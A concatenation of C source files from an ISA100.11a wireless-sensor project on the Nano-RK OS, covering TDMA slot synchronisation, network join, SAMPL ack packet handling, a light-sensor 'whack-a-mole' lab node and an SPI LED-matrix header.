while ((n = rf_rx_check_sfd()) == 0) {
if (_nrk_os_timer_get() > timeout) {
tmp = slot - previous_tx_slot;
if(slot == previous_tx_slot)
slot_expired += 25;
else{
tmp = slot - previous_tx_slot;
if(tmp>0)
slot_expired += tmp;
else
slot_expired += 25+tmp;
}
//printf("%d,%d,%d,%d,%d\n\r",slot_expired,tmp_curSec,tmp_offsetSec,tmp_offsetNanoSec,++tmp_count);
//printf("%d,%d\n\r",slot_expired,isa_param.channel);
//printf("%d,%d,%d\n\r",slot_expired,slot,previous_tx_slot);
//spend too much time on waiting for a pkt's arrival
rf_rx_off ();
#ifdef LED_DEBUG
nrk_led_clr(1);
#endif
#ifdef RX_DEBUG
// printf("sfd times out.\n\r");
#endif
//nrk_gpio_clr(NRK_DEBUG_1);
return;
}
}
nrk_gpio_clr(NRK_DEBUG_1);
timeout = _nrk_os_timer_get();
timeout += 2; // 5ms
if (n != 0) {
n = 0;
//printf("Packet on its way\n\r");
while ((n = rf_polling_rx_packet (true,4)) == 0) {
//printf("%d\n\r",_nrk_os_timer_get());
if (_nrk_os_timer_get () > timeout) {
#ifdef RX_DEBUG
printf("packet is too long, times out.\n\r");
#endif
tmp_curSec = _nrk_os_timer_get();
// spend too much time on receiving pkt.
return; // huge timeout as fail safe
}
//if(n==-6)
// printf("%d\n\r",_nrk_os_timer_get());
}
}
rf_rx_off ();
if (n == 1) {// successfully received ACK
slot_expired = 0;
//isa_rx_data_ready = 1;
DHR = isa_rfRxInfo.pPayload[DHR_INDEX];
#ifdef ACK_DEBUG
//printf("DHR = %d.\n\r", isa_rfRxInfo.pPayload[DHR_INDEX]);
#endif ACK_DEBUG
if((DHDR & (1<<7))&&isa_node_mode!=ISA_GATEWAY){
if(DHR & (1<<7)){
offsetX = ((0x0000|isa_rfRxInfo.pPayload[OFFSET_HIGH])<<8)&0xff00 + 0x0000|isa_rfRxInfo.pPayload[OFFSET_LOW];
#ifdef ACK_DEBUG
// printf("offset X is %d.\n\r", offsetX);
// printf("offset Y is %d.\n\r", offsetY);
nrk_led_toggle(ORANGE_LED);
putchar('a');
#endif ACK_DEBUG
//printf("%d,%d\n\r",offsetX,offsetY);
time_correction = offsetX - offsetY;
#ifdef HIGH_TIMER_DEBUG
printf("time correction is %d.\n\r", time_correction);
#endif
//printf("time correction is %d.\n\r", time_correction);
// SYNC as a by-product of communication.
//tmp_nrk_prev_timer_val = _nrk_prev_timer_val;
//printf("%d\n\r",time_correction);
//printf("%d\n\r",HIGH_TIMER_TICKES_PER_MILISEC-time_correction%HIGH_TIMER_TICKES_PER_MILISEC);
timeout=50;
curSec = _nrk_os_timer_get();
if(time_correction >= 0&&curSec<7){
tmp_curSec = curSec;
/*do{
curSec = _nrk_os_timer_get();
}while(curSec<=7);*/
_nrk_os_timer_stop();
//_nrk_os_timer_reset();
offsetSec = time_correction/HIGH_TIMER_TICKES_PER_MILISEC+1;
tmp_offsetSec = offsetSec;
offsetNanoSec = HIGH_TIMER_TICKES_PER_MILISEC-time_correction%HIGH_TIMER_TICKES_PER_MILISEC;
tmp_offsetNanoSec = offsetNanoSec;
//printf("%d,%d\n\r",curSec,offsetSec);
//if(curSec+offsetSec>=10)
//printf("%d,%d\n\r",curSec,offsetSec);
/*if(curSec+offsetSec>=9){
_nrk_set_next_wakeup(curSec+offsetSec+2);
if(curSec+offsetSec>=10)
printf("%d,%d\n\r",curSec,offsetSec);
}
else
_nrk_set_next_wakeup(10);*/
_nrk_high_speed_timer_reset();
nrk_spin_wait_us(50);
//printf("%d,%d,%d\n\r",curSec,offsetSec,offsetNanoSec);
nrk_gpio_set(NRK_DEBUG_2);
do{}while(_nrk_high_speed_timer_get()<offsetNanoSec);
nrk_gpio_clr(NRK_DEBUG_2);
//nrk_high_speed_timer_wait(0,offsetNanoSec);
//nrk_high_speed_timer_wait(0,4912);
_nrk_os_timer_set(curSec+offsetSec);
nrk_spin_wait_us(100);
#ifdef CORRECTION
nrk_gpio_set(NRK_DEBUG_1);
nrk_gpio_clr(NRK_DEBUG_1);
#endif
//printf("p\n\r");
_nrk_os_timer_start();
}else if(-time_correction>8000&&curSec<7){
_nrk_os_timer_stop();
//_nrk_os_timer_reset();
_nrk_high_speed_timer_reset();
do{
NOP();
NOP();
NOP();
NOP();
}while(timeout--);
//_nrk_set_next_wakeup(10);
#ifdef CORRECTION
nrk_gpio_set(NRK_DEBUG_2);
//nrk_high_speed_timer_wait(0,22800); // for test
nrk_gpio_clr(NRK_DEBUG_2);
#endif
//printf("%d\n\r",-time_correction);
nrk_high_speed_timer_wait(0,-time_correction);
_nrk_os_timer_set(curSec);
timeout = 100;
do{
NOP();
NOP();
NOP();
NOP();
}while(timeout--);
_nrk_os_timer_start();
}
//_nrk_prev_timer_val=tmp_nrk_prev_timer_val;
//nrk_cur_task_TCB->next_wakeup = 10;
_nrk_high_speed_timer_reset();
nrk_spin_wait_us(50);
}
}
}
}//wait for ACK
}
uint8_t _isa_join_process ()
{
int8_t n;
uint16_t timeout;
uint16_t timer;
uint8_t tdma_start_tick;
uint8_t battery_save_cnt;
uint8_t last_nrk_tick;
uint8_t i;
timer=0;
battery_save_cnt=0;
while(1)
{
rf_set_rx (&isa_rfRxInfo, isa_param.channel); // sets rx buffer and channel
rf_polling_rx_on ();
n = 0;
_isa_sync_ok = 0;
last_nrk_tick=0; // should be 0 going in
//_nrk_prev_timer_val=250;
//_nrk_set_next_wakeup(250);
//_nrk_os_timer_set(0);
//timeout=200;
while ((n = rf_rx_check_sfd()) == 0) {
// every OS tick
if(last_nrk_tick!=_nrk_os_timer_get()) {
last_nrk_tick=_nrk_os_timer_get();
timer++;
if(timer>ISA_TOKEN_TIMEOUT){
timer=0;
break;
}
}
}
//_nrk_high_speed_timer_reset();
tdma_start_tick=_nrk_os_timer_get();
timeout = tdma_start_tick+4;
// an interrupt could happen in here and mess things up
if (n != 0) {
n = 0;
// Packet on its way
while ((n = rf_polling_rx_packet (false,128)) == 0) {
if (_nrk_os_timer_get () > timeout)
{
//nrk_kprintf( PSTR("Pkt timed out\r\n") );
break; // huge timeout as failsafe
}
}
}
rf_rx_off ();
if (n == 1 /*&& isa_rfRxInfo.length>0*/) {
// if(isa_rfRxInfo.pPayload[SRC_INDEX]==isa_clk_src_id){//change
// CRC and checksum passed
if(isa_rfRxInfo.pPayload[DAUX_INDEX+7]==10){ // DAUX packet
isa_rx_data_ready = 1;
//global_slot = (volatile)isa_rfRxInfo.pPayload[SLOT_INDEX];
isa_set_channel_pattern(isa_rfRxInfo.pPayload[DAUX_INDEX+9]); //set channel hopping pattern
channelIndex=isa_rfRxInfo.pPayload[DAUX_INDEX+10];
currentChannel = slottedPattern[channelIndex];
isa_set_channel(currentChannel);
for(i=0;i<4;i++){ // set tx slots
if(isa_rfRxInfo.pPayload[DAUX_INDEX+19+i]==0)
break;
else{
isa_tdma_tx_mask |= ((uint32_t) 1) << isa_rfRxInfo.pPayload[DAUX_INDEX+19+i];
isa_sched[isa_rfRxInfo.pPayload[DAUX_INDEX+19+i]] = 1;
tx_slot_from_join[i]=isa_rfRxInfo.pPayload[DAUX_INDEX+19+i];
// printf("TX:%d\r\n",tx_slot_from_join[i]);
}
}
for(i=0;i<4;i++){ // set rx slots
if(isa_rfRxInfo.pPayload[DAUX_INDEX+23+i]==0)
break;
else{
isa_tdma_rx_mask |= ((uint32_t) 1) << isa_rfRxInfo.pPayload[DAUX_INDEX+23+i];
isa_sched[isa_rfRxInfo.pPayload[DAUX_INDEX+23+i]] = 1;
}
}
nrk_event_signal(SIG(isa_rx_pkt_signal));
break;
}
// }
}
}
_isa_join_ok=1;
isa_rx_pkt_release();
return _isa_join_ok;
}
int8_t isa_join_ready()
{
if (_isa_join_ok == 1)
return NRK_OK;
else
return NRK_ERROR;
}
/** FIXME this is only a temperary function need to be more specified
* _isa_init_sync()
*
* This function is used for join process.
* A node that wants to join the network would keep listening first
* and set up first sync.
*
* Return: _isa_sync_ok.
*/
uint8_t _isa_init_sync ()
{
int8_t n;
uint16_t timeout;
uint16_t timer;
uint8_t tdma_start_tick;
uint8_t battery_save_cnt;
uint8_t last_nrk_tick;
uint8_t tmp_nrk_prev_timer_val;
//volatile uint16_t sfd_start_time;
//printf("%d,%d\n\r",isa_param.channel,global_slot);
// DISABLE_GLOBAL_INT ();
timer=0;
battery_save_cnt=0;
while(1)
{
//printf("Init sync \r\n");
isa_rfRxInfo.pPayload[DHDR_INDEX]=configDHDR();
//isa_rfRxInfo.pPayload[SLOT_INDEX]=global_slot;
#ifdef LED_DEBUG
nrk_led_set(1);
#endif
rf_set_rx (&isa_rfRxInfo, isa_param.channel); // sets rx buffer and channel
rf_polling_rx_on ();
n = 0;
_isa_sync_ok = 0;
last_nrk_tick=0; // should be 0 going in
//_nrk_prev_timer_val=250;
_nrk_set_next_wakeup(250);
_nrk_os_timer_set(0);
//timeout=200;
while ((n = rf_rx_check_sfd()) == 0) {
// every OS tick
if(last_nrk_tick!=_nrk_os_timer_get()) {
last_nrk_tick=_nrk_os_timer_get();
timer++;
if(timer>ISA_TOKEN_TIMEOUT){
timer=0;
break;
}
}
}
//printf("3 \n");
_nrk_high_speed_timer_reset();
// capture SFD transition with high speed timer
//sfd_start_time=_nrk_high_speed_timer_get();
tdma_start_tick=_nrk_os_timer_get();
timeout = tdma_start_tick+4;
// an interrupt could happen in here and mess things up
if (n != 0) {
n = 0;
// Packet on its way
while ((n = rf_polling_rx_packet (false,128)) == 0) {
// printf("4 \n");
if (_nrk_os_timer_get () > timeout)
{
//nrk_kprintf( PSTR("Pkt timed out\r\n") );
break; // huge timeout as failsafe
}
}
}
rf_rx_off ();
//printf("5 \n");
if (n == 1 /*&& isa_rfRxInfo.length>0*/) {
if(isa_rfRxInfo.pPayload[SRC_INDEX]==isa_clk_src_id){//change
// CRC and checksum passed
isa_rx_data_ready = 1;
//rtl_rx_slot = 0;
//DHDR = (volatile)isa_rfRxInfo.pPayload[DHDR_INDEX];
global_slot += (volatile)isa_rfRxInfo.pPayload[SLOT_INDEX];
nrk_led_toggle(GREEN_LED);
putchar ('i');
nrk_event_signal(SIG(isa_rx_pkt_signal));
break;
//
}
}
}
#ifdef LED_DEBUG
nrk_led_clr(1);
#endif
//printf("os_timer=%d\r\n",_nrk_os_itimer_get());
#ifdef INIT_SYNC
nrk_gpio_set(NRK_DEBUG_1);
#endif
_isa_sync_ok = 1;
isa_rx_pkt_release();
tmp_nrk_prev_timer_val=_nrk_prev_timer_val;
_nrk_os_timer_stop();
//_nrk_os_timer_reset();
_nrk_set_next_wakeup(10);
_nrk_os_timer_set(7);
nrk_high_speed_timer_wait(0,SFD_TO_NEXT_SLOT_TIME);
//_nrk_os_timer_reset();
_nrk_os_timer_start();
//_nrk_prev_timer_val=9;
//printf("%d\n\r", _nrk_os_timer_get());
nrk_cur_task_TCB->next_wakeup = 10;
//printf("%d\n\r",_nrk_prev_timer_val);
// _nrk_high_speed_timer_reset();
// slot_start_time=_nrk_high_speed_timer_get();
#ifdef INIT_SYNC
nrk_gpio_clr(NRK_DEBUG_1);
#endif
return _isa_sync_ok;
}
void isa_nw_task ()
{
uint8_t slot;
uint32_t slot_mask;
uint16_t next_slot_offset = 0;
uint8_t FIRST = 1;
_isa_ready = 0;
// wait for isa ready
do {
nrk_wait_until_next_period ();
}while (_isa_ready == 0);
_isa_ready = 1;
nrk_gpio_clr(NRK_DEBUG_0);
//nrk_time_get (&last_slot_time);// dont know if it is useful
while (1) {
//nrk_gpio_set(NRK_DEBUG_2);
// reset high speed timer and then record the timer value used for calculating offsets
_nrk_high_speed_timer_reset();
slot_start_time = _nrk_high_speed_timer_get();
//nrk_time_get (&last_slot_time);// dont know if it is useful
last_slot = global_slot; //global_slot has been initialized to MAX_ISA_GLOBAL_SLOTS in isa_init()
if (last_slot > MAX_ISA_GLOBAL_SLOTS)
last_slot -= (MAX_ISA_GLOBAL_SLOTS+1);
current_global_slot = global_slot;
/* global_slot should be wrapped */
if (global_slot > MAX_ISA_GLOBAL_SLOTS) {
global_slot -= MAX_ISA_GLOBAL_SLOTS;
global_cycle++;
}
slot = global_slot % ISA_SLOTS_PER_FRAME;
slot_mask = ((uint32_t) 1) << slot;
if(_isa_sync_ok == 1){
#ifdef CHANNEL_HOPPING
channelIndex += next_slot_offset;
currentChannel = slottedPattern[(channelIndex)&0x0F];
isa_set_channel(currentChannel);
if(slot>=22 && isa_node_mode == ISA_GATEWAY){
slowIndex = slowIndex % 3;
currentChannel = slowPattern[slowIndex];
isa_set_channel(currentChannel);
if(slot>=24)
slowIndex++;
}
// printf("CH:%d SL: %d\r\n",currentChannel,slot);
#endif
//printf("%d,%d\n\r",currentChannel,(channelIndex)&0x0F);
//printf("isa_rx_data_ready:%d\r\n",isa_rx_data_ready);
// if TX slot mask and tx ready, send a packet
#ifdef JOIN_PROCESS
if(slot>=22 && isa_node_mode == ISA_GATEWAY)
isa_tx_data_ready |= ((uint32_t) 1 << slot);
#endif
#ifdef TX_RX_DEBUG
//printf("R\r\n");
nrk_gpio_set(NRK_DEBUG_0);
#endif
if (slot_mask & isa_tx_data_ready & isa_tdma_tx_mask){
//printf("isa tx slot %d.\n\r",slot);
// printf("TX %d,%d,%d\n\r",currentChannel,(channelIndex)&0x0F,slot);
//printf("tx\n\r");
_isa_tx (slot);
previous_tx_slot = slot;
#ifdef HIGH_TIMER_DEBUG
//printf("TX later, high speed timer value is %d.\n\r", _nrk_high_speed_timer_get());
#endif
} else if ((slot_mask & isa_tdma_rx_mask) && (isa_rx_data_ready == 0)){// if RX slot mask and rx not ready, send a packet
#ifdef TX_RX_DEBUG
//printf("R\r\n");
//nrk_gpio_set(NRK_DEBUG_0);
#endif
//printf("isa rx slot %d.\n\r",slot);
// printf("RX %d,%d %d\n\r",currentChannel,(channelIndex)&0x0F, slot);
//printf("rx\n\r");
_isa_rx (slot);
}
#ifdef TX_RX_DEBUG
nrk_gpio_clr(NRK_DEBUG_0);
//nrk_gpio_clr(NRK_DEBUG_1);
#endif
// if RX slot mask and RX buffer free, try to receive a packet
/*else if ((slot_mask & rtl_tdma_rx_mask) && (rtl_rx_data_ready == 0)){
_rtl_rx (slot);
}*/
} else {
///do joining or sync request here
DHDR = configDHDR();
if(isa_node_mode != ISA_GATEWAY){//change
#ifdef JOIN_PROCESS
if(!_isa_join_ok){
_isa_join_process();
}
#endif
_isa_sync_ok = _isa_init_sync();
//printf("waiting for sync...isa_sync_ok is %d.\n\r",_isa_sync_ok);
}else if (isa_node_mode == ISA_GATEWAY){
_isa_sync_ok = 1;
}
}
//nrk_gpio_clr(NRK_DEBUG_2);
//printf("next_slot_offset %d\n\r",next_slot_offset);
// To make sure that initial sync is correct
/*if(FIRST){
//printf("%d\n\r",_nrk_os_timer_get ());
next_slot_offset = 1;
FIRST = 0;
}*/
if(slot_expired >= EXPIRATION && isa_node_mode != ISA_GATEWAY){
//printf("re-sync\n\r");
_isa_sync_ok = 0;
slot_expired = 0;
global_slot = 100;
next_slot_offset = 0;
resync_times++;
if(isa_id!=0){
channelIndex = isa_clk_src_id;
currentChannel = slottedPattern[channelIndex];
}else{
channelIndex = 0;
currentChannel = slottedPattern[channelIndex];
}
isa_set_channel(currentChannel);
}else{
//printf("global_slot is %d. global cycle is %d.\n\r",global_slot,global_cycle);
next_slot_offset = isa_get_slots_until_next_wakeup (global_slot);
//printf("NOS:%d\n\r",next_slot_offset);
//printf("%d,%d,%d,%d\n\r",_nrk_os_timer_get (),_nrk_get_next_wakeup (),global_slot,next_slot_offset);
global_slot += next_slot_offset;
//nrk_clr_led (1);
#ifdef LED_SLOT_DEBUG
nrk_led_clr(0);
#endif
offsetY = 0;
//printf("%d\n\r",next_slot_offset);
nrk_wait_until_next_n_periods (next_slot_offset);
#ifdef LED_SLOT_DEBUG
nrk_led_set(0);
#endif
//}
//nrk_set_led (1);
// Set last_slot_time to the time of the start of the slot
}
}
}
void isa_task_config ()
{
isa_task.task = isa_nw_task;
nrk_task_set_stk( &isa_task, isa_task_stack, ISA_STACK_SIZE);
isa_task.prio = 20;
isa_task.FirstActivation = TRUE;
isa_task.Type = BASIC_TASK;
isa_task.SchType = PREEMPTIVE;
isa_task.period.secs = 0;
isa_task.period.nano_secs = 10*NANOS_PER_MS;
isa_task.cpu_reserve.secs = 0;
isa_task.cpu_reserve.nano_secs = 0;
isa_task.offset.secs = 0;
isa_task.offset.nano_secs = 0;
nrk_activate_task (&isa_task);
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/nano-RK-well-sync/projects/SAMPL/pkt_handlers/ack_pkt.c
#include <globals.h>
#include <sampl.h>
#include <ack_pkt.h>
#ifdef NANORK
#include <nrk.h>
#include <nrk_error.h>
#else
#define my_mac 0
#define RF_MAX_PAYLOAD_SIZE 128
#endif
int8_t ack_generate(SAMPL_UPSTREAM_PKT_T *pkt)
{
ACK_PKT_T p;
p.mac_addr=my_mac;
pkt->payload_len = ack_pkt_add( &p, pkt->payload,0);
pkt->num_msgs=1;
pkt->pkt_type=ACK_PKT;
return NRK_OK;
}
int8_t ack_p2p_generate(SAMPL_PEER_2_PEER_PKT_T *pkt)
{
ACK_PKT_T p;
p.mac_addr=my_mac;
pkt->payload_len = ack_pkt_add( &p, pkt->payload,0);
return NRK_OK;
}
int8_t ack_aggregate(SAMPL_UPSTREAM_PKT_T *in, SAMPL_UPSTREAM_PKT_T *out)
{
uint8_t len,i,j,k,dup;
ACK_PKT_T p1, p2;
for(i=0; i<in->num_msgs; i++ )
{
dup=0;
// get next ping packet to compare against current outgoing list
ack_pkt_get( &p1, in->payload, i );
for(k=0; k<out->num_msgs; k++ )
{
// get packet from outgoing list and compare against incomming packet
ack_pkt_get( &p2, out->payload, k );
if(p1.mac_addr==p2.mac_addr) dup=1;
}
if(dup==0)
{
// if packet is unique, add to outgoing packet
out->payload_len=ack_pkt_add( &p1, out->payload, out->num_msgs );
out->num_msgs++;
}
}
return NRK_OK;
}
void ack_pkt_get( ACK_PKT_T *p, uint8_t *buf, uint8_t index )
{
p->mac_addr=buf[index*ACK_PKT_SIZE];
}
uint8_t ack_pkt_add( ACK_PKT_T *p, uint8_t *buf, uint8_t index )
{
buf[index*ACK_PKT_SIZE]= p->mac_addr;
return ((index+1)*ACK_PKT_SIZE);
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/code/current/nano-RK-well-sync/projects/SAMPL/client_core/.svn/text-base/debug.c.svn-base
#include <debug.h>
#include <nrk.h>
#include <nrk_time.h>
#include <nrk_stats.h>
nrk_task_stat_t t_stat;
nrk_time_t t;
void debug_reset()
{
debug_stats.rx_pkts=0;
debug_stats.tx_pkts=0;
debug_stats.tx_retry=0;
debug_stats.sensor_samples=0;
}
void debug_update()
{
nrk_time_get(&t);
debug_stats.uptime.secs=t.secs;
debug_stats.uptime.nano_secs=t.nano_secs;
nrk_stats_get_deep_sleep(&t);
debug_stats.deep_sleep.secs=t.secs;
debug_stats.deep_sleep.nano_secs=t.nano_secs;
nrk_stats_get(0, &t_stat);
t=_nrk_ticks_to_time(t_stat.total_ticks);
debug_stats.idle_time.secs=t.secs;
debug_stats.idle_time.nano_secs=t.nano_secs;
}
<file_sep>/ISA100.11a-master/ISA100_11a/code/current/nano-RK-well-sync/projects/lab2/slave/.svn/text-base/main.c.svn-base
#include <nrk.h>
#include <include.h>
#include <ulib.h>
#include <stdio.h>
#include <avr/sleep.h>
#include <hal.h>
#include <rt_link.h>
#include <nrk_error.h>
#include <nrk_events.h>
#include <nrk_driver.h>
#include <nrk_driver_list.h>
#include <ff_basic_sensor.h>
#include <math.h>
#define MY_CHANNEL 13
#define MOLE_ID 4
#define LIGHT_DIFF 20 // Determined experimentally
#define MASTER_TX_SLOT 0
#define MY_TX_SLOT ((MOLE_ID*2)+2)
NRK_STK Stack1[NRK_APP_STACKSIZE];
nrk_task_type TaskOne;
void Task1(void);
void nrk_create_taskset();
uint8_t tx_buf[RF_MAX_PAYLOAD_SIZE];
uint8_t rx_buf[RF_MAX_PAYLOAD_SIZE];
nrk_time_t timestart;
nrk_time_t timeend;
nrk_time_t newtime;
nrk_time_t timeout;
int
main ()
{
nrk_setup_ports();
nrk_setup_uart(UART_BAUDRATE_115K2);
nrk_kprintf( PSTR("Starting up...\r\n") );
nrk_init();
nrk_led_clr(0);
nrk_led_clr(1);
nrk_led_clr(2);
nrk_led_clr(3);
nrk_time_set(0,0);
nrk_register_drivers();
rtl_task_config();
nrk_create_taskset ();
nrk_start();
return 0;
}
void Task1()
{
uint8_t j, i;
uint8_t rssi, slot,length, mole_id;
uint8_t *local_rx_buf;
uint8_t fd,val;
uint16_t light = 0;
uint16_t light_avg = 0;
uint8_t whacked = 0;
printf( "Task1 PID=%d\r\n",nrk_get_pid());
printf( "Node ID=%d\r\n",MOLE_ID);
nrk_led_set(GREEN_LED);
rtl_init (RTL_MOBILE);
rtl_set_channel(MY_CHANNEL);
rtl_set_schedule( RTL_RX, MASTER_TX_SLOT, 1 );
rtl_set_schedule( RTL_TX, MY_TX_SLOT, 1 );
rtl_start();
rtl_rx_pkt_set_buffer(rx_buf, RF_MAX_PAYLOAD_SIZE);
while(!rtl_ready()) nrk_wait_until_next_period();
fd=nrk_open(FIREFLY_SENSOR_BASIC,READ);
if(fd==NRK_ERROR) nrk_kprintf(PSTR("Failed to open sensor driver\r\n"));
nrk_time_get(&timeout);
nrk_time_get(&timeend);
val=nrk_set_status(fd,SENSOR_SELECT,LIGHT);
// Get current lighting
for(i=0;i<5;i++){
nrk_read(fd,&light,2);
light_avg += light;
}
/*nrk_read(fd,&light,2);
light_avg += light;
nrk_read(fd,&light,2);
light_avg += light;
nrk_read(fd,&light,2);
light_avg += light;
nrk_read(fd,&light,2);
light_avg += light;
nrk_read(fd,&light,2);
light_avg += light;*/
light_avg /= 5;
//printf( "Light value = %d\r\n", light);
while(1) {
if( rtl_tx_pkt_check(MY_TX_SLOT)!=0 ) {
nrk_led_clr(RED_LED);
printf( "Pending on slot %d\r\n",MY_TX_SLOT );
} else {
//read sensor output to see whether mole is whacked, and print reading
nrk_read(fd,&light,2);
printf( "Light value = %d\r\n", light);
// if light closed or mole whacked, then transmit '1' - indicates the master to change the mole
// If the light darkens by a pre-set difference, count as a whack
if (light_avg+LIGHT_DIFF < light || whacked == 1) {
sprintf(&tx_buf[PKT_DATA_START],"MOLE_ID=%d LIGHT=1", MOLE_ID);
} else {
sprintf(&tx_buf[PKT_DATA_START],"MOLE_ID=%d LIGHT=0", MOLE_ID);
// Update average
/*light_avg = 0;
for(i=0;i<5;i++){
nrk_read(fd,&light,2);
light_avg += light;
}
light_avg /= 5;*/
light_avg *= 5;
light_avg += light;
light_avg /= 6;
//light_avg >>= 1;
//light_avg &= 0xffff;
}
// Transmit
length=strlen(&tx_buf[PKT_DATA_START])+PKT_DATA_START+1;
rtl_tx_pkt( tx_buf, length, MY_TX_SLOT);
printf( "\nTX on slot %d\r\n",MY_TX_SLOT);
for(i=PKT_DATA_START;i<length;i++)
printf("%c",tx_buf[i]);
nrk_led_toggle(BLUE_LED);
}
if( rtl_rx_pkt_check()!=0 ) {
local_rx_buf=rtl_rx_pkt_get(&length, &rssi, &slot);
printf( "RX on slot %d %d: ",slot,length );
for(i=PKT_DATA_START; i<length; i++ )
printf( "%c",local_rx_buf[i] );
// buffer position 37 stores the next mole id from the master
// if that is equal to MYMOLEID then turn on the led
if((local_rx_buf[37]-48) == MOLE_ID) {
if (light_avg + LIGHT_DIFF < light || whacked == 1) {
whacked = 1;
nrk_led_clr(RED_LED);
} else {
nrk_led_set(RED_LED);
}
} else {
whacked = 0;
nrk_led_clr(RED_LED);
}
//printf(" rounds value %d ", local_rx_buf[51]-48);
//printf("\n NEW: %c",local_rx_buf[37]);
//nrk_kprintf( PSTR("\r\n") );
rtl_rx_pkt_release();
}
// if((local_rx_buf[51]-48)>=9)
// nrk_led_clr(RED_LED);
rtl_wait_until_rx_pkt();
}
}
void
nrk_create_taskset()
{
TaskOne.task = Task1;
TaskOne.Ptos = (void *) &Stack1[NRK_APP_STACKSIZE-1];
TaskOne.Pbos = (void *) &Stack1[0];
TaskOne.prio = 2;
TaskOne.FirstActivation = TRUE;
TaskOne.Type = BASIC_TASK;
TaskOne.SchType = PREEMPTIVE;
TaskOne.period.secs = 1;
TaskOne.period.nano_secs = 0;
TaskOne.cpu_reserve.secs = 0;
TaskOne.cpu_reserve.nano_secs = 0;
TaskOne.cpu_reserve.nano_secs = 100*NANOS_PER_MS;
TaskOne.offset.secs = 0;
TaskOne.offset.nano_secs= 0;
nrk_activate_task (&TaskOne);
nrk_kprintf( PSTR("Create Done\r\n") );
}
void nrk_register_drivers()
{
int8_t val;
// Register the Basic FireFly Sensor device driver
// Make sure to add:
// #define NRK_MAX_DRIVER_CNT
// in nrk_cfg.h
// Make sure to add:
// SRC += $(ROOT_DIR)/src/drivers/platform/$(PLATFORM_TYPE)/source/ff_basic_sensor.c
// in makefile
val=nrk_register_driver( &dev_manager_ff_sensors,FIREFLY_SENSOR_BASIC);
if(val==NRK_ERROR) nrk_kprintf( PSTR("Failed to load my ADC driver\r\n") );
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/nano-RK-well-sync/src/net/isa/isa_error.h
#ifndef _ISA_ERROR_H
#define _ISA_ERROR_H
#include <include.h>
#include <stdio.h>
#define LINK_CAPACITY_ERROR 1
#define NEIGHBOR_CAPACITY_ERROR 2
#define TRANSMIT_QUEUE_CAPACITY_ERROR 3
#define MAX_PAYLOAD_ERROR 4
//********************************Extern functions*******************************************
extern void setIsaError(uint8_t);
extern uint8_t getIsaError ();
extern void printIsaError();
//*******************************************************************************************
#endif
<file_sep>/ISA100.11a-master/ISA100_11a/code/current/nano-RK-well-sync/projects/final_project/repeater/spi_matrix.h
#include <include.h>
/*
* this debug pin is connected to SRCLR(serial clear)
* It is used to clear the values held by the shift registers
* Clears on falling edge
*/
#define MATRIX_CLEAR() \
do{\
PORTF &= ~(0x10);\
PORTF |= 0x10;\
}\
while(0)
//nrk_gpio_clr(NRK_DEBUG_0);\
//nrk_gpio_set(NRK_DEBUG_0);\
}\
while(0)
/*
* This debug pin is connected to RCLK. It is used to make the shift register store its value to the storage register
* and output it on its output lines
*/
#define MATRIX_DISPLAY()\
do{\
PORTF |= 0x20;\
PORTF &= ~(0x20);\
}\
while(0)
//nrk_gpio_set(NRK_DEBUG_1);\
//nrk_gpio_clr(NRK_DEBUG_1);\
}\
while(0)
#define DISPLAY_INTERVAL_SECS 4
typedef struct {
uint8_t size;
uint8_t pattern[8][3];
uint8_t currentIndex;
}MATRIX_TABLE;
extern void spiSend(void);
extern void spiPatternSend(uint8_t p1, uint8_t p2,uint8_t p3);
extern void setMatrix();
extern void setNewDisplay(uint8_t cIndex, uint8_t nIndex);
<file_sep>/ISA100.11a-master/ISA100_11a/11-2/backup/isa_noresync_without_write_file/recipient/main.c
#include <nrk.h>
#include <include.h>
#include <ulib.h>
#include <stdio.h>
#include <avr/sleep.h>
#include <hal.h>
#include <isa.h>
#include <nrk_error.h>
#include <nrk_events.h>
//#define MY_CHANNEL 20
#define MY_TX_SLOT 1
//#define MY_RX_SLOT 2
#define MY_ID 1
#define MY_CLK_SRC_ID 0
#define NUM_OF_TEST_SET 16
#define MAX_SLIP_BUF 17
#define NUM_OF_NODES 3
NRK_STK Stack1[NRK_APP_STACKSIZE];
nrk_task_type TaskOne;
void Task1(void);
NRK_STK Stack2[NRK_APP_STACKSIZE];
nrk_task_type TaskTwo;
void Task2 (void);
void nrk_create_taskset();
void packet_measurement_better(uint8_t * local_rx_buf);
/*Buffers*/
uint8_t tx_buf[RF_MAX_PAYLOAD_SIZE];
uint8_t rx_buf[RF_MAX_PAYLOAD_SIZE];
uint8_t slip_tx_buf[MAX_SLIP_BUF];
uint8_t slip_rx_buf[MAX_SLIP_BUF];
/*packet evaluation related*/
uint8_t pkt_measure[NUM_OF_NODES][NUM_OF_TEST_SET];
uint8_t sendFlag;
uint8_t frame_cnt[NUM_OF_NODES]; //add 1 every 8 packets
uint8_t pkt_cnt[NUM_OF_NODES];
uint8_t current_pkt_index[NUM_OF_NODES];
uint8_t received_pkt_index[NUM_OF_NODES];
uint8_t current_node;
uint8_t send_node;
/* signal related declaration */
int8_t pkt_record_done_signal;
int8_t pkt_record_check()
{
return sendFlag;
}
int8_t wait_until_record_full()
{
nrk_signal_register(pkt_record_done_signal);
if (pkt_record_check() != 0)
return NRK_OK;
nrk_event_wait (SIG(pkt_record_done_signal));
return NRK_OK;
}
void nrk_create_taskset();
uint8_t tx_buf[RF_MAX_PAYLOAD_SIZE];
uint8_t rx_buf[RF_MAX_PAYLOAD_SIZE];
nrk_time_t timestart;
nrk_time_t timeend;
nrk_time_t newtime;
nrk_time_t timeout;
int
main ()
{
nrk_setup_ports();
nrk_setup_uart(UART_BAUDRATE_115K2);
nrk_kprintf( PSTR("Starting up...\r\n") );
nrk_init();
nrk_led_clr(0);
nrk_led_clr(1);
nrk_led_clr(2);
nrk_led_clr(3);
nrk_time_set(0,0);
isa_task_config();
nrk_create_taskset ();
nrk_start();
return 0;
}
void Task1()
{
uint8_t i;
uint8_t length;
uint8_t *local_rx_buf;
int8_t rssi;
uint8_t cnt;
//uint8_t my_tx_slot[4];
printf( "Task1 PID=%d\r\n",nrk_get_pid());
nrk_led_set(GREEN_LED);
isa_set_channel_pattern(1);
isa_init(ISA_RECIPIENT,MY_ID, MY_CLK_SRC_ID);
isa_set_schedule(ISA_RECIPIENT,MY_CLK_SRC_ID);
//isa_set_channel(MY_CHANNEL);
isa_start();
isa_rx_pkt_set_buffer(rx_buf, RF_MAX_PAYLOAD_SIZE);
while(!isa_ready()) nrk_wait_until_next_period();
